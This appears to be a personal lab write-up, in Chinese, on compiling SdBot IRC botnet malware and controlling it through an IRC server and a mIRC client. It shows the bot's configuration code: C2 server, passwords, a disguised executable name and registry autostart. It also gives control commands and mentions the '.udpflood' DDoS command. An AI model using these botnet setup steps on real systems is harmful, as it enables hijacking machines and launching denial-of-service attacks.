sdbot安装

网上下载SdBot源码，VC6.0下编译，（我在网上下了多个源码但有些编译通不过），编译之前需要修改源文件：

// bot configuration

 const char botid[] = "1"; // bot id

 const char password[] = "123456"; //bot password

 const int maxlogins = 10; // maximum number of simultaneous logins

 const char server[] = "192.168.10.164";// server

 const int port = 6667; // server port

 const char serverpass[] = "123456";// server password

 const char channel[] = "#Channel1";// channel that the bot should join

 const char chanpass[] = ""; //channel password

 const char server2[] = ""; // backupserver (optional)

 const int port2 = 6667; // backup server port

 const char channel2[] = ""; //backup channel (optional)

 const char chanpass2[] = ""; //backup channel password (optional)

 const BOOL topiccmd = FALSE; // set to TRUE toenable topic commands

 const BOOL rndfilename = FALSE; // use randomfile name

 const char filename[] ="syscfg32.exe"; // destination file name

 const BOOL regrun = TRUE; // use the Runregistry key for autostart

 const BOOL regrunservices = TRUE; // use theRunServices registry key for autostart

 const char valuename[] = "ConfigurationLoader"; // value name for autostart

 const char prefix = '.'; // command prefix(one character max.)

 const char version[] = "sdbot v0.5b by[sd]"; // bot's VERSION reply

 const int cryptkey = 0; // encryption key (not used right now)

 const int maxaliases = 16; // maximum number of aliases (must be greater thanthe number of predefined aliases).

password是sdbot的密码

server是要连接的IRC服务器的IP

port是IRC服务器的密码

channel是加入的频道

剩下的配置我没用

 

另外需要注意的是sdbot在启动后就感染了这台机器，进行了修改注册表和配置文件等操作，而且还隐藏了进程，其实就是中了这个病毒了，后来都没法关掉，重启就自动执行了，杀毒软件都不行，安全模式也不行。好像后续一些网上发布的僵尸程序可控性好些。

 

关于IRCserver服务器我一直以为只用于连接和转发消息等，后来发现IRCserver很重要，选不好无法控制bot。我后来用了IRCXpro这个服务器。

同时我下载了一个mIRC客户端作为僵尸控制端。

//

在第一台机器上启动IRCServer：

在第二台机器上执行编译好的sdbot

IRCServer上发现有一个用户(User)，一个频道（Channel）：

在第三台机器上启动mIRC客户端：

选择IRCServer:

可以增加、编辑、删除IRCserver配置：

连接IRCServer：

连接成功（我们的Server是192.168.19.164）：

执行/list看当前的频道（Channel），可以看到当前有1个频道Channel1，就是我们在sdbot源码中设定的：

执行/join#Channel1将控制端加入频道Channel1，liufei是我们mIRC的名字，安装时设置的，.vtpv是sdbot的名字，这是sdbot启动时随机生成的。现在Channel1中就有两个用户了（一个被控端sdbot和一个控制端mIRC）：

在IRCserver界面上也可以看到现在两个用户，一个频道：

控制端在channel窗口中执行.login 123456登录被控端sdbot，123456是sdbot的密码，前面源码中设置好的：

这时可以在channel窗口中执行一些命令控制sdbot，如执行.sysinfo被控sdbot可以返回其所在主机系统信息：

网上可以查到很多sdbot命令，但很多我执行了不成功，估计还有很多没搞明白的地方，另外在channel中执行的命令会发给频道中所有sdbot，实现真正的僵尸网络控制。sdbot还有升级版本Rxbot，它在sdbot基础上集成了一些网络攻击代码，控制端可以在channel中执行一些攻击命令如.udpflood利用sdbot发动DDos攻击。